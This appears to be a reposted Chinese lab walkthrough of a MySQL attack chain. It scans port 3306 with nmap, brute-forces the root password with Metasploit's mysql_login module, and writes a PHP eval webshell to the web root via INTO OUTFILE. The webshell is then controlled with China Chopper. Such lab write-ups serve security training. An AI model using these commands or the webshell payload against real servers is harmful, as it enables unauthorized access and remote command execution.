一、信息收集
利用nmap工具扫描靶机3306端口开启情况
nmap -sV 192.168.180.133 -p 3306
发现靶机开启3306端口,MySQL数据库
二、渗透测试
打开msfconsole渗透测试平台
搜索mysql_login漏洞模块
search mysql_login
使用auxiliary/scanner/mysql/mysql_login漏洞攻击模块
use 0
查看需要配置的参数
show options
设置密码字典
set pass_file /pass.txt
设置目标IP
set rhosts 192.168.180.133
设置爆破用户名
set username root
运行
exploit
成功爆破出密码 P@sswrd
三、远程登录
使用我们爆破出的用户名密码远程登录MySQL数据库
mysql -h 192.168.180.133 -u root -p
登录成功后写入一句话木马到/var/www目录中
select '<?php @eval($_POST[pass]);?>' into outfile '/var/www/shell.php';
写入成功后使用中国菜刀连接
双击进入
连接成功,可看到系统文件及信息
右击也可以打开虚拟终端,执行命令文章来源:https://www.toymoban.com/news/detail-728238.html
实验结束文章来源地址https://www.toymoban.com/news/detail-728238.html
到了这里,关于利用MySQL暴力破解实现远程控制的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
